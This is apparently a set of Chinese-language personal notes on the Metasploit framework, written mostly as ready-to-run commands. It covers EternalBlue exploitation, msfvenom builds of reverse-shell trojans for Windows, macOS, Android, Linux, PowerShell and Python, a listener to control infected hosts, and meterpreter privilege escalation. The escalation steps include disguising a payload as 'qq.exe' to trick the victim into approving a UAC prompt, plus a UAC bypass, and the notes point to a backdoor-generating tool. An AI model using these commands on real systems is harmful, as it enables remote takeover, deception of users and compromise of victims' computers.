MSF框架以及使用
msfconsole //打开msf
在msf里可以使用别的工具,比如nmap
nmap -sV [ip] //扫描一下
msf如果攻击对方需要条件:
1.要有漏洞
2.攻击载荷
ms17010
use exploit/windows/smb/ms17_010_eternalblue //使用永恒之蓝漏洞
show options //查看需要的选项
set RHOST [目标ip]
run //运行
msf内网渗透
生成exe木马
在/root目录底下
msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=[本地ip] LPORT=[本地端口] -b "\00" -e x86/shikata_ga_nai -f exe >msf.exe
生成好之后下载到靶机
在msf里建立木马的控制端
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [本机ip]
exploit //进入监听状态
background //暂时不操作,把木马放到后台
sessions //查看控制多少人
sessions -i 1 //进入1号主机的控制端
jobs //查看目前在执行多少个任务
back //后退一格
当目标运行木马,在控制端就会上线
生成其他木马的命令
生成mac木马:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=自己ip LPORT=4444 -f macho -o payload.macho
# 老版本的mac
生成android木马(需要数字签名):
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=自己ip LPORT=4444 -f apk -o payload.apk
生成powershell木马:
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=自己ip LPORT=4444 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
生成linux木马:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=自己ip LPORT=4444 -f elf -o payload.elf
生成python木马:
msfvenom -p python/meterpreter/reverse_tcp LHOST=自己ip LPORT=4444 -f raw -o payload.py
meterpreter操作:
首先进入对方电脑
UAC提权
getuid //查看当前用户权限
getsystem //直接提权(有风险的)
考虑使用ask模块提权
background 把木马放到后台
use exploit/windows/local/ask //加载ask模块
info 查看信息
set SESSION 1 使用漏洞在1号木马控制的目标上
set FILENAME qq.exe 伪装成qq
set LHOST [本机ip]
exploit
会在用户桌面上弹出一个允许qq启动,用户选择yes成功
getuid发现不是system
getsystem提高到最高
UAC权限
UAC绕过提权(成功率不高)
use exploit/windows/local/bypassuac # (多用来进攻32位系统)
show options
set SESSION 1
exploit 开始攻击
# 如果攻击成功,会给你一个新的session号
# 进入新的session号
getuid
getsystem
github
胖老鼠,后门
https://github.com/Screetsec/TheFatRat
安卓payload